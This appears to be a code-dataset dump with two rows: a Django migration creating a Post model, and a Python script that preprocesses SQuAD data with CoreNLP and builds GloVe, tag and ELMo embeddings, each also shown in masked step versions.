code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
initial = True
dependencies = [migrations.swappable_dependency(settings.
AUTH_USER_MODEL), ('base', '0007_topfilter')]
operations = [migrations.CreateModel(name='Post', fields=[('base_ptr',
models.OneToOneField(auto_created=True, on_delete=django.db.models.
deletion.CASCADE, parent_link=True, primary_key=True, serialize=
False, to='base.Base')), ('title', models.CharField(max_length=50)),
('text', models.TextField()), ('post_related_user', models.
ForeignKey(on_delete=django.db.models.deletion.CASCADE,
related_name='post_related_user_name', to=settings.AUTH_USER_MODEL)
)], bases=('base.base',))]
<|reserved_special_token_1|>
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
# Auto-generated Django migration (autopep8-compacted form): creates the
# multi-table-inheritance model `Post` on top of the concrete `base.Base`.
class Migration(migrations.Migration):
    # First migration that creates this app's own tables.
    initial = True
    # Depends on whichever user model is configured (swappable) and on
    # base's 0007 migration, which must exist before `base.Base` is referenced.
    dependencies = [migrations.swappable_dependency(settings.
        AUTH_USER_MODEL), ('base', '0007_topfilter')]
    # `base_ptr` is the implicit parent link for MTI; `post_related_user`
    # cascades when the owning user row is deleted.
    operations = [migrations.CreateModel(name='Post', fields=[('base_ptr',
        models.OneToOneField(auto_created=True, on_delete=django.db.models.
        deletion.CASCADE, parent_link=True, primary_key=True, serialize=
        False, to='base.Base')), ('title', models.CharField(max_length=50)),
        ('text', models.TextField()), ('post_related_user', models.
        ForeignKey(on_delete=django.db.models.deletion.CASCADE,
        related_name='post_related_user_name', to=settings.AUTH_USER_MODEL)
        )], bases=('base.base',))]
<|reserved_special_token_1|>
# Generated by Django 2.0.4 on 2018-04-30 14:01
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
# Auto-generated by Django; creates the `Post` model that inherits (MTI)
# from the concrete `base.Base` model.
class Migration(migrations.Migration):
    # First migration that creates this app's own tables.
    initial = True
    dependencies = [
        # The user FK below targets the swappable AUTH_USER_MODEL.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('base', '0007_topfilter'),
    ]
    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                # Parent link created automatically for multi-table inheritance.
                ('base_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='base.Base')),
                ('title', models.CharField(max_length=50)),
                ('text', models.TextField()),
                # Deleting the user cascades to their posts.
                ('post_related_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='post_related_user_name', to=settings.AUTH_USER_MODEL)),
            ],
            bases=('base.base',),
        ),
    ]
|
flexible
|
{
"blob_id": "d13589979ba7b6facd8339111323270c9920a9bf",
"index": 8127,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('base', '0007_topfilter')]\n operations = [migrations.CreateModel(name='Post', fields=[('base_ptr',\n models.OneToOneField(auto_created=True, on_delete=django.db.models.\n deletion.CASCADE, parent_link=True, primary_key=True, serialize=\n False, to='base.Base')), ('title', models.CharField(max_length=50)),\n ('text', models.TextField()), ('post_related_user', models.\n ForeignKey(on_delete=django.db.models.deletion.CASCADE,\n related_name='post_related_user_name', to=settings.AUTH_USER_MODEL)\n )], bases=('base.base',))]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('base', '0007_topfilter')]\n operations = [migrations.CreateModel(name='Post', fields=[('base_ptr',\n models.OneToOneField(auto_created=True, on_delete=django.db.models.\n deletion.CASCADE, parent_link=True, primary_key=True, serialize=\n False, to='base.Base')), ('title', models.CharField(max_length=50)),\n ('text', models.TextField()), ('post_related_user', models.\n ForeignKey(on_delete=django.db.models.deletion.CASCADE,\n related_name='post_related_user_name', to=settings.AUTH_USER_MODEL)\n )], bases=('base.base',))]\n",
"step-5": "# Generated by Django 2.0.4 on 2018-04-30 14:01\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('base', '0007_topfilter'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Post',\n fields=[\n ('base_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='base.Base')),\n ('title', models.CharField(max_length=50)),\n ('text', models.TextField()),\n ('post_related_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='post_related_user_name', to=settings.AUTH_USER_MODEL)),\n ],\n bases=('base.base',),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
Data pre-processing
"""
import os
import corenlp
import numpy as np
import ujson as json
from tqdm import tqdm
from collections import Counter
from bilm import dump_token_embeddings
import sys
sys.path.append('../..')
from LIB.utils import save
def _append_lines(path, lines):
    # Append one record per line.  Append mode is deliberate: process()
    # streams one paragraph batch at a time into the same output files.
    with open(path, 'a') as f:
        f.write('\n'.join(lines) + '\n')


def process(json_file, outpur_dir, exclude_titles=None, include_titles=None):
    """
    Annotate a SQuAD-style json file with CoreNLP (tokens, POS, NER) and dump
    line-aligned paragraph / question / sentence / answer files under the
    output directory, then derive BIO answer labels via label().

    :param json_file: original data in json format
    :param outpur_dir: the output directory of pre-processed data
        (parameter name keeps its historical typo for backward compatibility)
    :param exclude_titles: article titles to exclude
    :param include_titles: article titles to include
    """
    para_file = "{}/paras".format(outpur_dir)
    question_file = "{}/questions".format(outpur_dir)
    sent_file = "{}/sents".format(outpur_dir)
    answer_file = "{}/answers".format(outpur_dir)
    print("Generating {} raw data...".format(json_file))
    # Corpus-wide maxima (handy for choosing padding sizes downstream).
    max_sent, max_sent_len, max_que_len = 0, 0, 0
    with open(json_file, "r") as fh, corenlp.CoreNLPClient(
            annotators="tokenize ssplit pos ner".split(),
            endpoint="http://localhost:9099", timeout=50000) as client:
        source = json.load(fh)
        for article in tqdm(source["data"]):
            title = article["title"]
            if include_titles and title not in include_titles:
                continue
            if exclude_titles and title in exclude_titles:
                continue
            for para in article["paragraphs"]:
                paragraphs, questions, answers, sents, ids = [], [], [], [], []
                paragraphs_pos, questions_pos, answers_pos, sents_pos = [], [], [], []
                paragraphs_ner, questions_ner, answers_ner, sents_ner = [], [], [], []
                answers_index, sents_index = [], []
                # paragraph
                context = para["context"]
                if not context.strip():
                    continue
                ann_para = client.annotate(context)
                max_sent = max(max_sent, len(ann_para.sentence))
                max_sent_len = max(max_sent_len, max(map(lambda x: len(x.token), ann_para.sentence)))
                paragraph_tokens, paragraph_pos, paragraph_ner = [], [], []
                for sent in ann_para.sentence:
                    for token in sent.token:
                        paragraph_tokens.append(token.word)
                        paragraph_pos.append(token.pos)
                        paragraph_ner.append(token.ner)
                # questions
                for qa in para["qas"]:
                    ques = qa["question"]
                    qa_id = qa["id"]  # renamed from `id` to stop shadowing the builtin
                    if not ques.strip():
                        continue
                    ann_que = client.annotate(ques)
                    max_que_len = max(max_que_len, len(ann_que.sentence[0].token))
                    question_tokens, question_pos, question_ner = [], [], []
                    for sent in ann_que.sentence:
                        for token in sent.token:
                            question_tokens.append(token.word)
                            question_pos.append(token.pos)
                            question_ner.append(token.ner)
                    # answers (a question may carry several reference answers)
                    all_answer_tokens, all_answer_pos, all_answer_ner, all_answer_index = [], [], [], []
                    all_sent_tokens, all_sent_pos, all_sent_ner, all_sent_index = [], [], [], []
                    for answer in qa["answers"]:
                        answer_text = answer["text"]
                        if not answer_text.strip():
                            continue
                        ann_ans = client.annotate(answer_text)
                        answer_tokens, answer_pos, answer_ner = [], [], []
                        for sent in ann_ans.sentence:
                            for token in sent.token:
                                answer_tokens.append(token.word)
                                answer_pos.append(token.pos)
                                answer_ner.append(token.ner)
                        answer_start = answer['answer_start']
                        answer_end = answer_start + len(answer_text)
                        # evidence sentence(s): every paragraph sentence whose
                        # character span overlaps the answer span
                        covering = [sent for sent in ann_para.sentence
                                    if sent.characterOffsetBegin <= answer_start <= sent.characterOffsetEnd
                                    or sent.characterOffsetBegin <= answer_end <= sent.characterOffsetEnd]
                        sentence = [token for sent in covering for token in sent.token]
                        if not sentence:
                            # Corrupt character offsets: skip this answer
                            # instead of crashing on sentence[0] below.
                            continue
                        # answer index: paragraph-level token span of the answer
                        y1_ans = None
                        for i, token in enumerate(sentence):
                            if token.beginChar - 1 <= answer_start <= token.endChar:
                                y1_ans = sentence[0].tokenBeginIndex + i
                        if y1_ans is None:
                            # Alignment failed.  The original guarded this with
                            # `assert` + bare except, which is stripped under
                            # `python -O`; an explicit check always runs.
                            continue
                        y2_ans = y1_ans + len(answer_tokens) - 1
                        # sentence index (paragraph-level token span)
                        y1_sent = sentence[0].tokenBeginIndex
                        y2_sent = sentence[-1].tokenBeginIndex
                        # Only append once ALL fields are known, so the .tok,
                        # .pos, .ner and .index files stay line-aligned (the
                        # original appended tokens before the alignment check
                        # and could desynchronize the files).
                        all_answer_tokens.append(' '.join(answer_tokens))
                        all_answer_pos.append(' '.join(answer_pos))
                        all_answer_ner.append(' '.join(answer_ner))
                        all_answer_index.append("{},{}".format(y1_ans, y2_ans))
                        all_sent_tokens.append(' '.join(token.word for token in sentence))
                        all_sent_pos.append(' '.join(token.pos for token in sentence))
                        all_sent_ner.append(' '.join(token.ner for token in sentence))
                        all_sent_index.append("{},{}".format(y1_sent, y2_sent))
                    paragraphs.append(' '.join(paragraph_tokens))
                    paragraphs_pos.append(' '.join(paragraph_pos))
                    paragraphs_ner.append(' '.join(paragraph_ner))
                    questions.append(' '.join(question_tokens))
                    questions_pos.append(' '.join(question_pos))
                    questions_ner.append(' '.join(question_ner))
                    answers.append('\t'.join(all_answer_tokens))
                    answers_pos.append('\t'.join(all_answer_pos))
                    answers_ner.append('\t'.join(all_answer_ner))
                    answers_index.append('\t'.join(all_answer_index))
                    sents.append('\t'.join(all_sent_tokens))
                    sents_pos.append('\t'.join(all_sent_pos))
                    sents_ner.append('\t'.join(all_sent_ner))
                    sents_index.append('\t'.join(all_sent_index))
                    ids.append(qa_id)
                # save para
                _append_lines("{}.tok".format(para_file), paragraphs)
                _append_lines("{}.pos".format(para_file), paragraphs_pos)
                _append_lines("{}.ner".format(para_file), paragraphs_ner)
                _append_lines("{}.id".format(para_file), ids)
                # save question
                _append_lines("{}.tok".format(question_file), questions)
                _append_lines("{}.pos".format(question_file), questions_pos)
                _append_lines("{}.ner".format(question_file), questions_ner)
                # save answer
                _append_lines("{}.tok".format(answer_file), answers)
                _append_lines("{}.pos".format(answer_file), answers_pos)
                _append_lines("{}.ner".format(answer_file), answers_ner)
                _append_lines("{}.index".format(answer_file), answers_index)
                # save sent
                _append_lines("{}.tok".format(sent_file), sents)
                _append_lines("{}.pos".format(sent_file), sents_pos)
                _append_lines("{}.ner".format(sent_file), sents_ner)
                _append_lines("{}.index".format(sent_file), sents_index)
    # get BIO labels
    label(para_file, answer_file)
def label(para_file, answer_file):
    """
    Append BIO answer labels for every paragraph line.

    Reads ``<para_file>.tok`` and ``<answer_file>.index`` in lock-step and
    appends one label line per paragraph to ``<para_file>.label``: 'B' on the
    first answer token, 'I' inside the span, 'O' elsewhere.  Only the first
    reference answer (tab-separated field 0 of the index line) is used; a
    missing or malformed index line yields an empty label line so the files
    stay aligned.

    :return: the maximum number of tokens observed in a paragraph
    """
    max_node = 0
    with open("{}.tok".format(para_file), 'r') as fp, open("{}.label".format(para_file), 'a') as fl, \
            open("{}.index".format(answer_file), 'r') as fa:
        for para in fp:
            words = para.strip().split(' ')
            max_node = max(len(words), max_node)
            answer = fa.readline()
            labels = []
            try:
                start, end = map(int, answer.split('\t')[0].split(','))
                for i in range(len(words)):
                    if start <= i <= end:
                        # answer words: 'B' opens the span, 'I' continues it
                        labels.append('B' if i == start else 'I')
                    else:
                        # non answer words
                        labels.append('O')
            except ValueError:
                # Narrowed from a bare except: only int()/unpacking of a
                # malformed or missing index line is tolerated here.
                pass
            fl.write(' '.join(labels) + '\n')
    return max_node
def get_data(train_json, dev_json, test_title_file, output_dir):
    """
    Pre-process the train/dev/test splits.

    The test split is deliberately carved out of the *training* json by
    article title (doclist), so train excludes those titles and test
    includes only them; dev is processed as-is.

    :param train_json: path to the training set json
    :param dev_json: path to the dev set json
    :param test_title_file: file with one held-out article title per line
    :param output_dir: root directory receiving train/, dev/ and test/
    """
    # `with` fixes the original's leaked file handle from
    # open(...).readlines().
    with open(test_title_file, 'r') as f:
        test_titles = {line.strip() for line in f}
    process(train_json, "{}/train/".format(output_dir), exclude_titles=test_titles)
    process(dev_json, "{}/dev/".format(output_dir))
    process(train_json, "{}/test/".format(output_dir), include_titles=test_titles)
def get_word_embedding(counter, emb_file, emb_size, vocab_size, vec_size, vocab_file):
    """
    get word embedding matrix from glove
    """
    print("Generating word embedding...")
    # Parse the GloVe text file: everything except the trailing vec_size
    # floats is the (possibly space-containing) token.
    vectors = {}
    with open(emb_file, "r", encoding="utf-8") as fh:
        for line in tqdm(fh, total=emb_size):
            parts = line.split()
            token = "".join(parts[:-vec_size])
            vectors[token] = [float(v) for v in parts[-vec_size:]]
    # PTB-style bracket escapes -> literal brackets before the GloVe lookup.
    TRANSLATE = {
        "-lsb-": "[", "-rsb-": "]", "-lrb-": "(", "-rrb-": ")", "-lcb-": "{",
        "-rcb-": "}", "-LSB-": "[", "-RSB-": "]", "-LRB-": "(", "-RRB-": ")",
        "-LCB-": "{", "-RCB-": "}"
    }
    SPECIAL_TOKENS = ["<NULL>", "<UNK>", "<S>", "</S>"]
    # Vocabulary: specials first, then corpus words by descending frequency.
    ranked = [w for w, _ in sorted(counter.items(), key=lambda kv: kv[1], reverse=True)]
    words = SPECIAL_TOKENS + ranked
    if vocab_size > 0:
        words = words[:vocab_size]
    # Skips index 0 (<NULL>) — presumably the ELMo vocab file must not
    # contain the padding token; verify against the bilm consumer.
    with open(vocab_file, 'w') as f:
        f.write('\n'.join(words[1:]))
    # Random init; rows found in GloVe are overwritten below.
    embedding = np.random.normal(scale=0.1, size=(len(words), vec_size))
    word2idx_dict = {w: i for i, w in enumerate(words)}
    unknown_count = 0
    for i, word in enumerate(words):
        lookup = TRANSLATE.get(word, word)
        # Try several casings before giving up on a pretrained vector.
        for candidate in (lookup, lookup.lower(), lookup.upper(), lookup.capitalize()):
            if candidate in vectors:
                embedding[i] = vectors[candidate]
                break
        else:
            unknown_count += 1
    return embedding, word2idx_dict, unknown_count
def get_tag_embedding(counter, data_type, vec_size):
    """
    get pos/ner/label tags' embedding matrix
    """
    print("Generating {} tag embedding...".format(data_type))
    # Tag vocabulary: two specials, then observed tags by descending count.
    ranked = sorted(counter.items(), key=lambda kv: kv[1], reverse=True)
    tags = ["<NULL>", "<UNK>"] + [tag for tag, _ in ranked]
    # Tag embeddings are trained from scratch, so random init is all we need.
    embedding = np.random.normal(scale=0.1, size=(len(tags), vec_size))
    tag2idx = {tag: idx for idx, tag in enumerate(tags)}
    return embedding, tag2idx
def get_vocab(config):
    """
    Build vocabularies and embedding matrices for words, chars, POS/NER tags
    and BIO answer labels from the pre-processed train/dev files, save them
    along with the index dictionaries, then dump ELMo token embeddings.

    :param config: namespace holding all file paths and embedding dimensions
        (glove_*, *_dim, *_emb_file, *_dictionary, vocab/elmo settings)
    """
    print("Get the vocabulary...")
    word_counter, char_counter = Counter(), Counter()
    pos_counter, ner_counter, label_counter = Counter(), Counter(), Counter()
    files = [(config.train_para_file, config.train_question_file), (config.dev_para_file, config.dev_question_file)]
    for para_file, que_file in files:
        # Walk the line-aligned .tok/.pos/.ner/.label files in lock-step.
        with open("{}.tok".format(para_file), 'r') as fp, open("{}.tok".format(que_file), 'r') as fq, \
                open("{}.pos".format(para_file), 'r') as fpp, open("{}.pos".format(que_file), 'r') as fqp, \
                open("{}.ner".format(para_file), 'r') as fpn, open("{}.ner".format(que_file), 'r') as fqn, \
                open("{}.label".format(para_file), 'r') as fpl:
            while True:
                para, question = fp.readline(), fq.readline()
                pos, que_pos = fpp.readline(), fqp.readline()
                ner, que_ner = fpn.readline(), fqn.readline()
                label = fpl.readline()
                # readline() returns '' only at EOF; stop when either
                # primary stream is exhausted.
                if not question or not para:
                    break
                if config.lower_word:
                    # Lowercasing applies to words only, never to tags/labels.
                    para = para.lower()
                    question = question.lower()
                para_tokens = para.strip().split(' ')
                que_tokens = question.strip().split(' ')
                pos_tags = pos.strip().split(' ')
                ner_tags = ner.strip().split(' ')
                que_pos_tags = que_pos.strip().split(' ')
                que_ner_tags = que_ner.strip().split(' ')
                labels = label.strip().split(' ')
                for token in para_tokens + que_tokens:
                    word_counter[token] += 1
                    for char in list(token):
                        char_counter[char] += 1
                for pos_tag in pos_tags + que_pos_tags:
                    pos_counter[pos_tag] += 1
                for ner_tag in ner_tags + que_ner_tags:
                    ner_counter[ner_tag] += 1
                for label in labels:
                    label_counter[label] += 1
    # Words get pretrained GloVe vectors; chars/tags/labels are random-init.
    word_emb_mat, word2idx_dict, unk_num = get_word_embedding(word_counter, emb_file=config.glove_word_file,
                                                              emb_size=config.glove_word_size,
                                                              vocab_size=config.vocab_size_limit,
                                                              vec_size=config.glove_dim, vocab_file=config.vocab_file)
    char_emb_mat, char2idx_dict = get_tag_embedding(char_counter, "char", vec_size=config.char_dim)
    pos_emb_mat, pos2idx_dict = get_tag_embedding(pos_counter, "pos", vec_size=config.pos_dim)
    ner_emb_mat, ner2idx_dict = get_tag_embedding(ner_counter, "ner", vec_size=config.ner_dim)
    label_emb_mat, label2idx_dict = get_tag_embedding(label_counter, "label", vec_size=config.label_dim)
    print("{} out of {} are not in glove".format(unk_num, len(word2idx_dict)))
    print("{} chars".format(char_emb_mat.shape[0]))
    print("{} pos tags, {} ner tags, {} answer labels, {} chars".format(
        pos_emb_mat.shape[0], ner_emb_mat.shape[0], label_emb_mat.shape[0], char_emb_mat.shape[0]))
    # Persist matrices and dictionaries via the project-level save() helper.
    save(config.word_emb_file, word_emb_mat, message="word embedding")
    save(config.char_emb_file, char_emb_mat, message="char embedding")
    save(config.pos_emb_file, pos_emb_mat, message="pos embedding")
    save(config.ner_emb_file, ner_emb_mat, message="ner embedding")
    save(config.label_emb_file, label_emb_mat, message="label embedding")
    save(config.word_dictionary, word2idx_dict, message="word dictionary")
    save(config.char_dictionary, char2idx_dict, message="char dictionary")
    save(config.pos_dictionary, pos2idx_dict, message="pos dictionary")
    save(config.ner_dictionary, ner2idx_dict, message="ner dictionary")
    save(config.label_dictionary, label2idx_dict, message="label dictionary")
    print("Dump elmo word embedding...")
    # Precompute context-independent ELMo token embeddings for the vocab
    # written by get_word_embedding().
    token_embedding_file = config.embedding_file
    dump_token_embeddings(
        config.vocab_file, config.elmo_options_file, config.elmo_weight_file, token_embedding_file
    )
if __name__ == '__main__':
    # Create the output directory tree.  os.makedirs is portable and
    # idempotent, unlike the original shelled-out `mkdir` chain (which
    # printed errors on re-runs and fails on non-POSIX shells).
    for split in ("train", "dev", "test"):
        os.makedirs("data/processed/{}".format(split), exist_ok=True)
    get_data("../../LIB/squad/train-v1.1.json", "../../LIB/squad/dev-v1.1.json",
             "../../LIB/squad/doclist-test.txt", "data/processed")
|
normal
|
{
"blob_id": "0c37806f0a7c0976711edd685fd64d2616147cb6",
"index": 4623,
"step-1": "<mask token>\n\n\ndef process(json_file, outpur_dir, exclude_titles=None, include_titles=None):\n \"\"\"\n :param json_file: original data in json format\n :param outpur_dir: the output directory of pre-processed data\n :param exclude_titles: article titles to exclude\n :param include_titles: article titles to include\n \"\"\"\n para_file = '{}/paras'.format(outpur_dir)\n question_file = '{}/questions'.format(outpur_dir)\n sent_file = '{}/sents'.format(outpur_dir)\n answer_file = '{}/answers'.format(outpur_dir)\n print('Generating {} raw data...'.format(json_file))\n max_sent, max_sent_len, max_que_len, max_ans_len = 0, 0, 0, 0\n with open(json_file, 'r') as fh, corenlp.CoreNLPClient(annotators=\n 'tokenize ssplit pos ner'.split(), endpoint='http://localhost:9099',\n timeout=50000) as client:\n source = json.load(fh)\n for article in tqdm(source['data']):\n title = article['title']\n if include_titles and title not in include_titles:\n continue\n if exclude_titles and title in exclude_titles:\n continue\n for para in article['paragraphs']:\n paragraphs, questions, answers, sents, ids = [], [], [], [], []\n paragraphs_pos, questions_pos, answers_pos, sents_pos = [], [\n ], [], []\n paragraphs_ner, questions_ner, answers_ner, sents_ner = [], [\n ], [], []\n answers_index, sents_index = [], []\n context = para['context']\n if not context.strip():\n continue\n ann_para = client.annotate(context)\n max_sent = max(max_sent, len(ann_para.sentence))\n max_sent_len = max(max_sent_len, max(map(lambda x: len(x.\n token), ann_para.sentence)))\n (ann_para_tokens, paragraph_tokens, paragraph_pos,\n paragraph_ner) = [], [], [], []\n for sent in ann_para.sentence:\n for token in sent.token:\n ann_para_tokens.append(token)\n paragraph_tokens.append(token.word)\n paragraph_pos.append(token.pos)\n paragraph_ner.append(token.ner)\n for qa in para['qas']:\n ques = qa['question']\n id = qa['id']\n if not ques.strip():\n continue\n ann_que = client.annotate(ques)\n max_que_len 
= max(max_que_len, len(ann_que.sentence[0].\n token))\n question_tokens, question_pos, question_ner = [], [], []\n for sent in ann_que.sentence:\n for token in sent.token:\n question_tokens.append(token.word)\n question_pos.append(token.pos)\n question_ner.append(token.ner)\n (all_answer_tokens, all_answer_pos, all_answer_ner,\n all_answer_index) = [], [], [], []\n (all_sent_tokens, all_sent_pos, all_sent_ner,\n all_sent_index) = [], [], [], []\n for answer in qa['answers']:\n answer_text = answer['text']\n if not answer_text.strip():\n continue\n ann_ans = client.annotate(answer_text)\n answer_tokens, answer_pos, answer_ner = [], [], []\n for sent in ann_ans.sentence:\n for token in sent.token:\n answer_tokens.append(token.word)\n answer_pos.append(token.pos)\n answer_ner.append(token.ner)\n all_answer_tokens.append(' '.join(answer_tokens))\n all_answer_pos.append(' '.join(answer_pos))\n all_answer_ner.append(' '.join(answer_ner))\n answer_start = answer['answer_start']\n answer_end = answer_start + len(answer_text)\n sentence = []\n for sent in ann_para.sentence:\n if (sent.characterOffsetBegin <= answer_start <=\n sent.characterOffsetEnd or sent.\n characterOffsetBegin <= answer_end <= sent.\n characterOffsetEnd):\n sentence.append(sent)\n sentence = [token for sent in sentence for token in\n sent.token]\n sentence_tokens = [token.word for token in sentence]\n sentence_pos = [token.pos for token in sentence]\n sentence_ner = [token.ner for token in sentence]\n all_sent_tokens.append(' '.join(sentence_tokens))\n all_sent_pos.append(' '.join(sentence_pos))\n all_sent_ner.append(' '.join(sentence_ner))\n y1_sent = sentence[0].tokenBeginIndex\n y2_sent = sentence[-1].tokenBeginIndex\n y1_ans = None\n for i, token in enumerate(sentence):\n if (token.beginChar - 1 <= answer_start <=\n token.endChar):\n y1_ans = sentence[0].tokenBeginIndex + i\n try:\n assert y1_ans != None\n except:\n continue\n y2_ans = y1_ans + len(answer_tokens) - 1\n 
all_answer_index.append('{},{}'.format(y1_ans, y2_ans))\n all_sent_index.append('{},{}'.format(y1_sent, y2_sent))\n paragraphs.append(' '.join(paragraph_tokens))\n paragraphs_pos.append(' '.join(paragraph_pos))\n paragraphs_ner.append(' '.join(paragraph_ner))\n questions.append(' '.join(question_tokens))\n questions_pos.append(' '.join(question_pos))\n questions_ner.append(' '.join(question_ner))\n answers.append('\\t'.join(all_answer_tokens))\n answers_pos.append('\\t'.join(all_answer_pos))\n answers_ner.append('\\t'.join(all_answer_ner))\n answers_index.append('\\t'.join(all_answer_index))\n sents.append('\\t'.join(all_sent_tokens))\n sents_pos.append('\\t'.join(all_sent_pos))\n sents_ner.append('\\t'.join(all_sent_ner))\n sents_index.append('\\t'.join(all_sent_index))\n ids.append(id)\n with open('{}.tok'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs) + '\\n')\n with open('{}.pos'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_pos) + '\\n')\n with open('{}.ner'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_ner) + '\\n')\n with open('{}.id'.format(para_file), 'a') as f:\n f.write('\\n'.join(ids) + '\\n')\n with open('{}.tok'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions) + '\\n')\n with open('{}.pos'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_pos) + '\\n')\n with open('{}.ner'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_ner) + '\\n')\n with open('{}.tok'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers) + '\\n')\n with open('{}.pos'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_pos) + '\\n')\n with open('{}.ner'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_ner) + '\\n')\n with open('{}.index'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_index) + '\\n')\n with open('{}.tok'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents) + '\\n')\n with open('{}.pos'.format(sent_file), 'a') as f:\n 
f.write('\\n'.join(sents_pos) + '\\n')\n with open('{}.ner'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_ner) + '\\n')\n with open('{}.index'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_index) + '\\n')\n label(para_file, answer_file)\n\n\n<mask token>\n\n\ndef get_data(train_json, dev_json, test_title_file, output_dir):\n test_titles = open(test_title_file, 'r').readlines()\n test_titles = set([line.strip() for line in test_titles])\n process(train_json, '{}/train/'.format(output_dir), exclude_titles=\n test_titles)\n process(dev_json, '{}/dev/'.format(output_dir))\n process(train_json, '{}/test/'.format(output_dir), include_titles=\n test_titles)\n\n\ndef get_word_embedding(counter, emb_file, emb_size, vocab_size, vec_size,\n vocab_file):\n \"\"\"\n get word embedding matrix from glove\n \"\"\"\n print('Generating word embedding...')\n embedding_dict = {}\n with open(emb_file, 'r', encoding='utf-8') as fh:\n for line in tqdm(fh, total=emb_size):\n array = line.split()\n word = ''.join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n embedding_dict[word] = vector\n TRANSLATE = {'-lsb-': '[', '-rsb-': ']', '-lrb-': '(', '-rrb-': ')',\n '-lcb-': '{', '-rcb-': '}', '-LSB-': '[', '-RSB-': ']', '-LRB-':\n '(', '-RRB-': ')', '-LCB-': '{', '-RCB-': '}'}\n SPECIAL_TOKENS = ['<NULL>', '<UNK>', '<S>', '</S>']\n words = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x:\n x[1], reverse=True)))\n words = SPECIAL_TOKENS + words\n if vocab_size > 0:\n words = words[:vocab_size]\n with open(vocab_file, 'w') as f:\n f.write('\\n'.join(words[1:]))\n embedding = np.random.normal(scale=0.1, size=(len(words), vec_size))\n word2idx_dict = {}\n unknown_count = 0\n for i, word in enumerate(words):\n word2idx_dict[word] = i\n if word in TRANSLATE:\n word = TRANSLATE[word]\n done = False\n for w in (word, word.lower(), word.upper(), word.capitalize()):\n if w in embedding_dict:\n embedding[i] = embedding_dict[w]\n done = True\n 
break\n if not done:\n unknown_count += 1\n return embedding, word2idx_dict, unknown_count\n\n\ndef get_tag_embedding(counter, data_type, vec_size):\n \"\"\"\n get pos/ner/label tags' embedding matrix\n \"\"\"\n print('Generating {} tag embedding...'.format(data_type))\n SPECIAL_TOKENS = ['<NULL>', '<UNK>']\n tags = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x: x\n [1], reverse=True)))\n tags = SPECIAL_TOKENS + tags\n embedding = np.random.normal(scale=0.1, size=(len(tags), vec_size))\n word2idx_dict = {w: i for i, w in enumerate(tags)}\n return embedding, word2idx_dict\n\n\ndef get_vocab(config):\n print('Get the vocabulary...')\n word_counter, char_counter = Counter(), Counter()\n pos_counter, ner_counter, label_counter = Counter(), Counter(), Counter()\n files = [(config.train_para_file, config.train_question_file), (config.\n dev_para_file, config.dev_question_file)]\n for para_file, que_file in files:\n with open('{}.tok'.format(para_file), 'r') as fp, open('{}.tok'.\n format(que_file), 'r') as fq, open('{}.pos'.format(para_file), 'r'\n ) as fpp, open('{}.pos'.format(que_file), 'r') as fqp, open(\n '{}.ner'.format(para_file), 'r') as fpn, open('{}.ner'.format(\n que_file), 'r') as fqn, open('{}.label'.format(para_file), 'r'\n ) as fpl:\n while True:\n para, question = fp.readline(), fq.readline()\n pos, que_pos = fpp.readline(), fqp.readline()\n ner, que_ner = fpn.readline(), fqn.readline()\n label = fpl.readline()\n if not question or not para:\n break\n if config.lower_word:\n para = para.lower()\n question = question.lower()\n para_tokens = para.strip().split(' ')\n que_tokens = question.strip().split(' ')\n pos_tags = pos.strip().split(' ')\n ner_tags = ner.strip().split(' ')\n que_pos_tags = que_pos.strip().split(' ')\n que_ner_tags = que_ner.strip().split(' ')\n labels = label.strip().split(' ')\n for token in (para_tokens + que_tokens):\n word_counter[token] += 1\n for char in list(token):\n char_counter[char] += 1\n for pos_tag in 
